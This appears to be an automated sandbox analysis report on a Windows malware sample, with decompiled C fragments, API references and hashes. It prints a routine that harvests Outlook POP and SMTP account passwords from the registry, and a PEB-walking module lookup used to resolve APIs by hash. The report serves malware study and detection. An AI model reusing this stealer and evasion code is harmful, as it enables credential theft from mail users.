                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                          • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                          • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                          • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404A19(void* _a4, short* _a8, void** _a12) {
                                          				long _t5;
                                          				void* _t6;
                                          
                                          				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                                          				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                                          				return _t5;
                                          			}

                                          APIs
                                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                          • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                          • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                          • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403C40(void* _a4) {
                                          				int _t4;
                                          				void* _t5;
                                          
                                          				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                                          				_t4 = FindCloseChangeNotification(_a4); // executed
                                          				return _t4;
                                          			}

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                          • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                          • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                          • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403C08(WCHAR* _a4) {
                                          				int _t4;
                                          				void* _t5;
                                          
                                          				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                                          				_t4 = DeleteFileW(_a4); // executed
                                          				return _t4;
                                          			}

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                          • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                          • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                          • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00402C1F(WCHAR* _a4) {
                                          				struct HINSTANCE__* _t4;
                                          				void* _t5;
                                          
                                          				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                                          				_t4 = LoadLibraryW(_a4); // executed
                                          				return _t4;
                                          			}

                                          APIs
                                          • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                          • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403BEF(void* _a4) {
                                          				int _t4;
                                          				void* _t5;
                                          
                                          				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                                          				_t4 = FindClose(_a4); // executed
                                          				return _t4;
                                          			}

                                          APIs
                                          • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                          • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                          • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                          • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403BB7(WCHAR* _a4) {
                                          				long _t4;
                                          				void* _t5;
                                          
                                          				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                                          				_t4 = GetFileAttributesW(_a4); // executed
                                          				return _t4;
                                          			}

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                          • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                          • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                          • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004049FF(void* _a4) {
                                          				long _t3;
                                          				void* _t4;
                                          
                                          				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                                          				_t3 = RegCloseKey(_a4); // executed
                                          				return _t3;
                                          			}

                                          APIs
                                          • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                          • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403B64(WCHAR* _a4) {
                                          				int _t3;
                                          				void* _t4;
                                          
                                          				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                                          				_t3 = PathFileExistsW(_a4); // executed
                                          				return _t3;
                                          			}

                                          APIs
                                          • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID:
                                          • API String ID: 1174141254-0
                                          • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                          • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                          • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                          • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: closesocket
                                          • String ID:
                                          • API String ID: 2781271927-0
                                          • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                          • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                          • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                          • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403F9E(void* _a4) {
                                          				int _t3;
                                          				void* _t4;
                                          
                                          				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                                          				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                                          				return _t3;
                                          			}

                                          APIs
                                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                          • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                          • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                          • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406472(long _a4) {
                                          				void* _t3;
                                          				void* _t4;
                                          
                                          				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                                          				Sleep(_a4); // executed
                                          				return _t3;
                                          			}

                                          APIs
                                          • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                          • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                          • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                          • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004058EA(char* _a4, char* _a8) {
                                          				char* _t4;
                                          				void* _t5;
                                          
                                          				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                                          				_t4 = StrStrA(_a4, _a8); // executed
                                          				return _t4;
                                          			}

                                          APIs
                                          • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                          • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                          • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                          • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405924(WCHAR* _a4, WCHAR* _a8) {
                                          				WCHAR* _t4;
                                          				void* _t5;
                                          
                                          				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                                          				_t4 = StrStrW(_a4, _a8); // executed
                                          				return _t4;
                                          			}

                                          APIs
                                          • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                          • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                          • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                          • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0040438F
                                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                          • VariantInit.OLEAUT32(?), ref: 004043C4
                                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                                          • VariantInit.OLEAUT32(?), ref: 00404414
                                          • SysAllocString.OLEAUT32(?), ref: 00404419
                                          • VariantInit.OLEAUT32(?), ref: 00404431
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                                          • String ID:
                                          • API String ID: 1312198159-0
                                          • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                          • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			// Collects one mail account from the key passed in *_a4: the value names are those of Outlook
                                          			// account settings, which is why the report flags this sample as stealing mail credentials.
                                          			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t40;
                                          				intOrPtr _t45;
                                          				intOrPtr _t47;
                                          				void* _t71;
                                          				void* _t75;
                                          				void* _t77;
                                          
                                          				_t72 = _a4;
                                          				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress"); // string-value lookup; 0 means this key holds no account
                                          				_t81 = _t71;
                                          				if(_t71 != 0) {
                                          					_push(__ebx);
                                          					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                                          					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                                          					_v40 = E00404BA7(_t81,  *_t72, L"PopPort"); // E00404BA7 appears to read numeric (DWORD) values
                                          					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                                          					_v8 = _v8 & 0x00000000;
                                          					_v20 = _t40;
                                          					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8); // _v8 receives the recovered password length
                                          					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                                          					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                                          					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                                          					_v12 = _v12 & 0x00000000;
                                          					_v32 = _t45;
                                          					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12); // _v12 receives the recovered password length
                                          					_t77 = _t75 + 0x50;
                                          					_v36 = _t47;
                                          					if(_v8 != 0 || _v12 != 0) { // only accounts that yielded a POP or SMTP password are recorded
                                          						// Serialise the fields into the global collection buffer at *0x49f934 (strings, ports, then passwords with their lengths).
                                          						E00405872( *0x49f934, _t71, 1, 0);
                                          						E00405872( *0x49f934, _t67, 1, 0);
                                          						_t74 = _v16;
                                          						E00405872( *0x49f934, _v16, 1, 0);
                                          						E00405781( *0x49f934, _v40);
                                          						E00405872( *0x49f934, _v20, 1, 0);
                                          						_push(_v8);
                                          						E00405762(_v16,  *0x49f934, _v24);
                                          						E00405872( *0x49f934, _v28, 1, 0);
                                          						E00405781( *0x49f934, _v44);
                                          						E00405872( *0x49f934, _v32, 1, 0);
                                          						_push(_v12);
                                          						E00405762(_t74,  *0x49f934, _v36);
                                          						_t77 = _t77 + 0x88;
                                          					} else {
                                          						_t74 = _v16;
                                          					}
                                          					// Release the strings returned by the lookups.
                                          					E0040471C(_t71);
                                          					E0040471C(_t67);
                                          					E0040471C(_t74);
                                          					E0040471C(_v20);
                                          					E0040471C(_v24);
                                          					E0040471C(_v28);
                                          					E0040471C(_v32);
                                          					E0040471C(_v36);
                                          				}
                                          				return 1;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                          • API String ID: 0-2111798378
                                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			// Walks the loader's module list from the PEB and returns the base address of the module whose
                                          			// name hash equals _a4; this is the lookup behind the hash constants passed to E004031E5 above.
                                          			E0040317B(intOrPtr _a4) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				void* __ecx;
                                          				intOrPtr _t17;
                                          				void* _t21;
                                          				intOrPtr* _t23;
                                          				void* _t26;
                                          				void* _t28;
                                          				intOrPtr* _t31;
                                          				void* _t33;
                                          				signed int _t34;
                                          
                                          				_push(_t25);
                                          				_t1 =  &_v8;
                                          				 *_t1 = _v8 & 0x00000000;
                                          				_t34 =  *_t1;
                                          				_v8 =  *[fs:0x30]; // TEB+0x30: pointer to the PEB
                                          				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc)); // PEB->Ldr (+0xc) -> InLoadOrderModuleList.Flink (+0xc): first LDR_DATA_TABLE_ENTRY
                                          				_t31 = _t23;
                                          				do {
                                          					_v12 =  *((intOrPtr*)(_t31 + 0x18)); // LDR_DATA_TABLE_ENTRY.DllBase
                                          					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28))); // FullDllName.Buffer (UNICODE_STRING at +0x24); helper builds a hashable copy of the name
                                          					_pop(_t26);
                                          					_t35 = _t28;
                                          					if(_t28 == 0) {
                                          						goto L3;
                                          					} else {
                                          						E004032EA(_t35, _t28, 0);
                                          						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19); // hash the module name and compare with the requested hash
                                          						_t33 = _t33 + 0x14;
                                          						if(_a4 == _t21) {
                                          							_t17 = _v12; // match: return this module's base address
                                          						} else {
                                          							goto L3;
                                          						}
                                          					}
                                          					L5:
                                          					return _t17;
                                          					L3:
                                          					_t31 =  *_t31; // InLoadOrderLinks.Flink: advance to the next entry
                                          				} while (_t23 != _t31); // stop once the list wraps around
                                          				_t17 = 0; // no module matched
                                          				goto L5;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                          Uniqueness

                                          Uniqueness Score: -1.00%